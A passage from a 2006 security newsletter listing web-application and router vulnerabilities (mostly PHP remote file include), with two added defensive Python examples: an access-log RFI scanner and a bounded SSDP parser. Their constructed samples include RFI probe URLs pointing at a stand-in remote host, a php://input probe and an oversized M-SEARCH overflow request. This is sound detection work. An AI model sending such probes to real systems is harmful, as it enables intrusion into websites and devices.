  • Description: osDate is an online dating system. It is prone to multiple HTML injection vulnerabilities due to improper sanitization of user-supplied input to the "txtcomment" and the "date" input boxes in the comments page. osDate version 1.1.7 is vulnerable.
  • Ref: http://www.securityfocus.com/bid/19034

  • 06.29.59 - CVE: Not Available
  • Platform: Web Application
  • Title: pollxt Module For Mambo Conf.Pollxt.PHP Remote File Include Vulnerability
  • Description: pollxt is a module for Mambo. The module is exposed to a remote file include issue due to insufficient sanitization of user-supplied input to the "mosConfig_absolute_path" parameter of the "conf.pollxt.php" script. pollxt versions 1.22.07 and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/19037

  • 06.29.60 - CVE: Not Available
  • Platform: Web Application
  • Title: Calendar Module For Mambo Com_Calendar.PHP Remote File Include
  • Description: Calendar Module for Mambo is a calendar plugin for the Mambo content management system. It is prone to a remote file include vulnerability because it fails to properly sanitize user-supplied input to the "absolute_path" parameter of the "com_calendar.php" script. Version 1.5.7 is affected.
  • Ref: http://www.securityfocus.com/archive/1/440407

  • 06.29.61 - CVE: Not Available
  • Platform: Web Application
  • Title: Subberz Lite UserFunc Remote File Include
  • Description: SubberZ[Lite] is a site subscription management application. Insufficient sanitization of the "myadmindir" variable of the "user-func.php" script exposes the application to a remote file include issue. All current versions are affected.
  • Ref: http://www.securityfocus.com/archive/1/440139

  • 06.29.62 - CVE: Not Available
  • Platform: Web Application
  • Title: Sitemap.XML.PHP Remote File Include
  • Description: Sitemap is a Mambo component. The module is exposed to a remote file include issue due to insufficient sanitization of user-supplied input to the "mosConfig_absolute_path" variable of the "components/com_sitemap/sitemap.xml.php" script. Sitemap version 2.0 is affected.
  • Ref: http://advisories.echo.or.id/adv/adv38-matdhule-2006.txt

  • 06.29.63 - CVE: Not Available
  • Platform: Web Application
  • Title: MiniBB Multiple Remote File Include Vulnerabilities
  • Description: MiniBB is a web forum application. It is affected by multiple remote file include issues due to insufficient sanitization of the "absolute_path" parameter of the "com_minibb.php" and "index.php" scripts. All current versions are affected.
  • Ref: http://www.securityfocus.com/bid/18998

  • 06.29.64 - CVE: CVE-2006-2484
  • Platform: Web Application
  • Title: IceWarp Web Mail Multiple File Include Vulnerabilities
  • Description: IceWarp Web Mail is the web mail client bundled with the Merak Mail Server. It is vulnerable to multiple remote file include issues due to insufficient sanitization of user-supplied input to various parameters and scripts. IceWarp Web Mail version 5.6 is vulnerable.
  • Ref: http://secunia.com/secunia_research/2005-62/advisory/

  • 06.29.65 - CVE: Not Available
  • Platform: Web Application
  • Title: ListMessenger LM_Path Parameter Remote File Include
  • Description: ListMessenger is a web-based mailing list management application. Insufficient sanitization of the "lm_path" parameter of the "listmessenger.php" script exposes the application to a remote file include issue. ListMessenger version 0.9.3 is affected.
  • Ref: http://www.securityfocus.com/archive/1/440291

  • 06.29.66 - CVE: Not Available
  • Platform: Web Application
  • Title: FlushCMS Class.Rich.PHP Remote File Include
  • Description: FlushCMS is a content management system. Insufficient sanitization of user-supplied input exposes the application to a remote file include issue. FlushCMS version 1.0.0-pre2 is affected.
  • Ref: http://www.securityfocus.com/bid/19023

  • 06.29.67 - CVE: Not Available
  • Platform: Web Application
  • Title: HTMLArea3 Addon For Mambo Config.Inc.PHP Remote File Include
  • Description: HTMLArea3 is a module for Mambo. It is affected by a file include issue due to insufficient sanitization of the "mosConfig_absolute_path" parameter in the "config.inc.php" script. HTMLArea3 versions 0.3en and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/19047

  • 06.29.68 - CVE: CVE-2006-3736
  • Platform: Web Application
  • Title: VideoDB Component Module For Mambo Xml_Domit_Lite_Include.PHP Remote File Include
  • Description: VideoDB Component is a module for the Mambo content management system. The module is exposed to a remote file include issue due to insufficient sanitization of user-supplied input to the "mosConfig_absolute_path" parameter of the "xml_domit_lite_include.php" script. VideoDB Component versions 0.3en and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/19049

  • 06.29.69 - CVE: Not Available
  • Platform: Web Application
  • Title: PHP-Post Logincookie Remote Authentication Bypass
  • Description: PHP-Post is a forum management application. It is vulnerable to an authentication bypass issue because of a flaw in the application's "Auto Login" feature. PHP-Post versions 0.21 and 1.0 are vulnerable.
  • Ref: http://www.securityfocus.com/archive/1/440419

  • 06.29.70 - CVE: CVE-2006-3303, CVE-2006-3304
  • Platform: Web Application
  • Title: DeluxeBB Multiple Input Validation Vulnerabilities
  • Description: DeluxeBB is a web-based message board implemented in PHP. It is prone to multiple input-validation vulnerabilities. The issues include a cross-site scripting vulnerability in the "sub" parameter of the "misc.php" script as well as multiple SQL injection vulnerabilities in unspecified parameters and scripts. Version 1.07 is vulnerable.
  • Ref: http://www.securityfocus.com/archive/1/440435

  • 06.29.71 - CVE: Not Available
  • Platform: Web Application
  • Title: hdweGUEST Multiple HTML Injection Vulnerabilities
  • Description: hdweGUEST is an online Guest book. It is prone to multiple HTML injection vulnerabilities due to improper sanitization of user-supplied input to the "username" and the "usernachricht" input boxes in the "new_entry.php" script. hdweGUEST versions 2.1.1 and prior are vulnerable.
  • Ref: http://www.securityfocus.com/bid/19053

  • 06.29.72 - CVE: Not Available
  • Platform: Web Application
  • Title: ToendaCMS Connector.PHP Arbitrary File Upload
  • Description: ToendaCMS is a content management application. It is vulnerable to an arbitrary file upload issue due to insufficient sanitization of user-supplied input to the "CurrentFolder" parameter of the "connector.php" script. ToendaCMS versions 1.0 and earlier are vulnerable.
  • Ref: http://www.milw0rm.com/exploits/2035

  • 06.29.73 - CVE: Not Available
  • Platform: Web Application
  • Title: AFCommerce Shopping Cart Multiple Input Validation Vulnerabilities
  • Description: AFCommerce Shopping Cart is a web-based shopping cart application implemented in PHP. It is prone to multiple input validation vulnerabilities. Reports indicate that the "Demo Store" version is affected by these vulnerabilities.
  • Ref: http://www.securityfocus.com/bid/19074

  • 06.29.74 - CVE: Not Available
  • Platform: Web Application
  • Title: IDevSpot PHPLinkExchange Index.PHP Remote File Include
  • Description: PHPLinkExchange is a link exchange directory application. Insufficient sanitization of the "page" variable in the "index.php" script exposes the application to a remote file include issue.
  • Ref: http://www.securityfocus.com/bid/19083

  • 06.29.75 - CVE: Not Available
  • Platform: Web Application
  • Title: IDevSpot PHPHostBot Index.PHP Remote File Include
  • Description: PHPHostBot is a web hosting account creation and billing automation application. It is exposed to a remote file include issue because it fails to properly sanitize user-supplied input to the "page" variable of "order/index.php". PHPHostBot version 1.0 is vulnerable.
  • Ref: http://pridels.blogspot.com/2006/07/phphostbot-remote-file-inclusion-vuln.html

  • 06.29.76 - CVE: Not Available
  • Platform: Web Application
  • Title: Chipmunk Guestbook AddEntry.PHP HTML Injection
  • Description: Chipmunk Guestbook is prone to an HTML injection issue due to insufficient sanitization of the "homepage" variable of the "addentry.php" script. Chipmunk Guestbook version 1.4 is affected.
  • Ref: http://www.securityfocus.com/bid/19087

  • 06.29.77 - CVE: Not Available
  • Platform: Web Application
  • Title: IManage Absolute_Path Multiple File Include Vulnerabilities
  • Description: iManage is a web-based content management system implemented in PHP. It is prone to multiple remote file-include vulnerabilities due to a failure in the application to properly sanitize user-supplied input to the "absolute_path" parameter of multiple scripts. iManage CMS version 4.0.12 is reported as vulnerable.
  • Ref: http://www.securityfocus.com/bid/19090/

  • 06.29.78 - CVE: Not Available
  • Platform: Web Application
  • Title: SiteDepth CMS Constants.PHP Remote File Include
  • Description: SiteDepth CMS is a content management system. It is exposed to a remote file include issue due to insufficient sanitization of user-supplied input in the "SD_DIR" parameter of the "constants.php" script. SiteDepth CMS versions 3.01 and prior are vulnerable to this issue.
  • Ref: http://www.securityfocus.com/bid/19094
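
Most of the Web Application entries in this issue are the same remote file include (RFI) pattern: a PHP script builds an include path from a request-supplied variable ("mosConfig_absolute_path", "absolute_path", "m2f_root_path", "myadmindir", "lm_path", "SD_DIR", "page") and an attacker points it at a URL of their own. The following is an added example and is not code from any of the products listed; it scans web-server access logs for such attempts. The log lines are constructed for the example, and the parameter set collects the names reported in this issue so that it can be extended as new ones appear.

```python
"""Added example, not code from any product listed here: flag remote file
include (RFI) attempts in web-server access logs. The log lines are constructed
for the example; the parameter names are the ones the entries above report and
the set is meant to be extended."""
import re
from urllib.parse import parse_qsl, urlsplit

# Include-path parameters named in this bulletin (lower-cased for comparison).
# A hit on one of these is near-certain abuse; a remote URL in any other
# parameter is still reported, but marked as unconfirmed.
KNOWN_INCLUDE_PARAMS = {
    "mosconfig_absolute_path", "absolute_path", "m2f_root_path",
    "myadmindir", "lm_path", "sd_dir", "page",
}

# Value shapes that make PHP's include()/require() fetch attacker-chosen content:
# remote URLs, stream wrappers (php://, data://, expect://) and UNC paths.
REMOTE_VALUE = re.compile(r"^\s*(?:https?|ftps?|php|data|expect)://|^\s*\\\\", re.IGNORECASE)

# Apache "combined" log format (nginx's default is the same shape).
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"')


def rfi_findings(line):
    """Return (client_ip, script, parameter, decoded_value, known_sink) tuples for one line."""
    m = LOG_LINE.match(line)
    if not m:
        return []
    parts = urlsplit(m.group("target"))
    hits = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if REMOTE_VALUE.search(value):
            hits.append((m.group("ip"), parts.path, name, value,
                         name.lower() in KNOWN_INCLUDE_PARAMS))
    return hits


def scan(lines):
    """Run rfi_findings over an iterable of log lines."""
    findings = []
    for line in lines:
        findings.extend(rfi_findings(line))
    return findings


# Constructed sample log: two Mambo-style RFI probes, a normal page request,
# a php://input probe and a benign search whose value happens to be a URL.
SAMPLE_LOG = [
    '198.51.100.23 - - [24/Jul/2006:10:15:02 +0000] "GET /mambo/components/com_extcalendar/extcalendar.php'
    '?mosConfig_absolute_path=http://203.0.113.9/c.txt? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"',
    '198.51.100.23 - - [24/Jul/2006:10:15:03 +0000] "GET /listmessenger.php'
    '?lm_path=https%3A%2F%2F203.0.113.9%2Fx.txt%3F HTTP/1.1" 200 498 "-" "libwww-perl/5.805"',
    '192.0.2.8 - - [24/Jul/2006:10:16:40 +0000] "GET /index.php?page=2 HTTP/1.1" 200 8213 "-" "Mozilla/5.0"',
    '192.0.2.8 - - [24/Jul/2006:10:16:55 +0000] "GET /order/index.php?page=php://input HTTP/1.1" 200 120 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [24/Jul/2006:10:17:10 +0000] "GET /search.php?q=http://example.com/ HTTP/1.1" 200 3301 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, script, param, value, known in scan(SAMPLE_LOG):
        tag = "KNOWN SINK" if known else "unconfirmed"
        print(f"{tag:11} {ip:15} {script} {param}={value}")
```

Two caveats when using this. Only GET requests are visible in an access log, so a probe that sends the parameter in a POST body (or, as with the Client-IP issues above, in a header) is not caught here. On the server side, turning off allow_url_fopen in php.ini blocks the http:// and ftp:// cases for these scripts, but it does not stop the php://input form, which is why the pattern keeps the stream wrappers; the real fix is the vendor patch, or in the Mambo cases checking that the script is only ever included from the CMS rather than called directly.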

  • 06.29.79 - CVE: CVE-2006-3561
  • Platform: Network Device
  • Title: BT Voyager Multiple Remote Authentication Bypass Vulnerabilities
  • Description: BT Voyager is a wireless internet connectivity device. It is exposed to multiple authentication bypass issues because of a flaw in the application's authentication process. BT Voyager 2091 Wireless ADSL, Firmware version 2.21.05.08m_A2pB018c1.d16d, and Firmware version 3.01m are affected.
  • Ref: http://www.securityfocus.com/archive/1/440405

  • 06.29.80 - CVE: Not Available
  • Platform: Network Device
  • Title: Cisco Security Monitoring Analysis and Response System Information Disclosure
  • Description: Cisco Security Monitoring, Analysis and Response System (CS-MARS) is a security system that correlates and analyzes data in event logs received from various network devices. It is prone to an information disclosure vulnerability because the Oracle database that ships with CS-MARS contains several default Oracle accounts with well-known passwords. Versions 4.1.5 and prior are reported as vulnerable.
  • Ref: http://www.cisco.com/warp/public/707/cisco-sa-20060719-mars.shtml

  • 06.29.81 - CVE: CVE-2006-3734
  • Platform: Network Device
  • Title: Cisco Security Monitoring Analysis and Response System Multiple Privilege Escalation Vulnerabilities
  • Description: Cisco Security Monitoring, Analysis and Response System (CS-MARS) is a security system that correlates and analyzes data in event logs received from various network devices. CS-MARS is exposed to multiple privilege escalation vulnerabilities. Please refer to the link below for further details. CS-MARS versions prior to 4.2.1 are vulnerable.
  • Ref: http://www.cisco.com/warp/public/707/cisco-sa-20060719-mars.shtml

  • 06.29.82 - CVE: CVE-2006-3687
  • Platform: Hardware
  • Title: Multiple D-Link Routers UPNP Buffer Overflow
  • Description: D-Link wired and wireless routers are prone to a buffer overflow vulnerability. The vulnerability exists in the UPnP M-SEARCH function when it processes an overly large request (approximately 800 bytes) received on the Local Area Network (LAN) interface. UPnP discovery (SSDP) carries HTTP-formatted requests over UDP port 1900, so an attacker can place the overflowing data in the request-URI field of the M-SEARCH request line, where a well-formed discovery request carries only "*". Because the vulnerable interface is the LAN side, the exposure is to hosts already on the local network (a compromised PC or a guest on the wireless segment), not to the Internet at large.
  • Ref: http://www.securityfocus.com/archive/1/440298
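
As an added example (not D-Link firmware code), the following parses an SSDP M-SEARCH datagram the way a hardened UPnP listener, or an IDS pre-processor watching UDP 1900, should: size limits are enforced before any field is interpreted, and the request-URI must be the literal "*". The limits are assumptions chosen below the approximately 800-byte trigger the advisory reports, and the sample datagrams are constructed.

```python
"""Added example, not D-Link firmware code: parse an SSDP M-SEARCH request with
hard size limits applied before any field is used. The limits are assumptions
chosen below the ~800-byte trigger the advisory reports; the sample datagrams
at the bottom are constructed for the example."""

MAX_DATAGRAM = 768       # assumption: below the reported ~800-byte trigger
MAX_REQUEST_LINE = 64    # "M-SEARCH * HTTP/1.1" is 19 bytes; anything longer is suspect
MAX_HEADER_VALUE = 256
REQUIRED_HEADERS = ("HOST", "MAN", "ST", "MX")


class SsdpError(ValueError):
    """Raised for any datagram that is not a well-formed, bounded M-SEARCH."""


def parse_msearch(datagram: bytes) -> dict:
    """Return the headers of a well-formed M-SEARCH, or raise SsdpError."""
    if len(datagram) > MAX_DATAGRAM:
        raise SsdpError(f"datagram too large: {len(datagram)} bytes")
    head, sep, _body = datagram.partition(b"\r\n\r\n")
    if not sep:
        raise SsdpError("missing end of headers")
    lines = head.split(b"\r\n")
    request_line = lines[0]
    if len(request_line) > MAX_REQUEST_LINE:
        raise SsdpError(f"request line too long: {len(request_line)} bytes")
    try:
        method, target, version = request_line.split(b" ")
    except ValueError:
        raise SsdpError("malformed request line") from None
    # The overflow described in the advisory sits in the URI slot; a discovery
    # request's target is always the literal "*", so anything else is rejected.
    if method != b"M-SEARCH" or target != b"*" or not version.startswith(b"HTTP/1."):
        raise SsdpError("not an M-SEARCH * request")
    headers = {}
    for raw in lines[1:]:
        name, colon, value = raw.partition(b":")
        if not colon or not name.strip():
            raise SsdpError("malformed header line")
        value = value.strip()
        if len(value) > MAX_HEADER_VALUE:
            raise SsdpError(f"header {name.decode(errors='replace')} too long")
        headers[name.strip().upper().decode("ascii", "replace")] = value.decode("ascii", "replace")
    missing = [h for h in REQUIRED_HEADERS if h not in headers]
    if missing:
        raise SsdpError(f"missing headers: {missing}")
    if headers["MAN"] != '"ssdp:discover"':
        raise SsdpError('MAN must be "ssdp:discover"')
    return headers


def is_safe_msearch(datagram: bytes) -> bool:
    """True if the datagram would be accepted by parse_msearch."""
    try:
        parse_msearch(datagram)
        return True
    except SsdpError:
        return False


# Constructed samples: a normal discovery request, a request with ~800 bytes in
# the URI slot (the shape the advisory describes), and a shorter variant that
# passes the datagram limit but fails the request-line limit.
GOOD_MSEARCH = (b"M-SEARCH * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\n"
                b'MAN: "ssdp:discover"\r\nMX: 2\r\nST: ssdp:all\r\n\r\n')
OVERSIZED_MSEARCH = (b"M-SEARCH " + b"A" * 800 + b" HTTP/1.1\r\n"
                     b"HOST: 239.255.255.250:1900\r\n\r\n")
LONG_URI_MSEARCH = (b"M-SEARCH " + b"A" * 300 + b" HTTP/1.1\r\n"
                    b"HOST: 239.255.255.250:1900\r\n\r\n")

if __name__ == "__main__":
    for label, sample in (("good", GOOD_MSEARCH), ("oversized", OVERSIZED_MSEARCH),
                          ("long-uri", LONG_URI_MSEARCH)):
        print(f"{label:10} accepted={is_safe_msearch(sample)}")
```

The check is layered on purpose: the datagram limit catches the reported ~800-byte case cheaply, and the request-line limit catches smaller overflows that a different firmware build might need. A router cannot be patched from the outside, so until D-Link firmware is updated the practical mitigation is to disable UPnP on the device and to treat any M-SEARCH with a non-"*" target on UDP 1900 as an attack indicator.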

(c) 2006. All rights reserved. The information contained in this newsletter, including any external links, is provided "AS IS," with no express or implied warranty, for informational purposes only. In some cases, copyright for material in this newsletter may be held by a party other than Qualys (as indicated herein) and permission to use such material must be requested from the copyright owner.